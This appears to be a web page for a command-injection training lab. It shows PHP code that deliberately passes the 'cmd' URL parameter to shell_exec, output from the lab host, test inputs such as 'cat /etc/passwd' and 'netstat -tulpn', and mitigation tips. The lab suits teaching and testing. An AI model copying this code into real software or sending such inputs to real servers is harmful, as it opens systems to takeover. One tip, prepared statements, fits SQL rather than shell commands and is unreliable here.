Lab 1: Basic Command Injection

RCE through direct command execution

Difficulty: Low

Lab Overview

This lab demonstrates a basic Remote Code Execution vulnerability through command injection. The application directly executes user-supplied commands without any validation or sanitization.

Objective: Execute arbitrary system commands to gain control of the server.

Vulnerable PHP Code 
// Handle command execution request
if (isset($_GET['cmd']) && !empty($_GET['cmd'])) {
    $command = $_GET['cmd'];
    
    // Vulnerable: Direct command execution without validation
    try {
        $output = shell_exec($command . ' 2>&1');
        $command_output = $output ?: 'No output';
        // Display output
    } catch (Exception $e) {
        // Error handling
    }
}

// Example vulnerable usage:
// ?cmd=whoami
// ?cmd=ls -la
// ?cmd=cat /etc/passwd
// ?cmd=id && uname -a
Command Execution Demo
Command executed successfully!
Quick Test Commands:
Command Output: id 
uid=2256(kzlabsst) gid=2260(kzlabsst) groups=2260(kzlabsst)
Vulnerability Details
  • Type: Remote Code Execution (RCE)
  • Severity: Critical
  • Parameter: cmd
  • Method: GET
  • Issue: Direct command execution without validation
Test Commands

Try these commands in the cmd parameter:

  • whoami - Current user
  • ls -la - List files
  • cat /etc/passwd - System users
  • id && uname -a - User ID and system info
  • ps aux - Running processes
  • netstat -tulpn - Network connections

Example URLs:

  • 1.php?cmd=whoami
  • 1.php?cmd=cat /etc/passwd
Quick Test URLs

Click these links to test the vulnerability:

Real-World Attack Scenarios
Mitigation Strategies
  • Never use user input in command execution functions
  • Use parameterized queries and prepared statements
  • Implement proper input validation and sanitization
  • Use whitelist-based validation for allowed commands
  • Implement proper error handling
  • Use least privilege principles
  • Implement proper logging and monitoring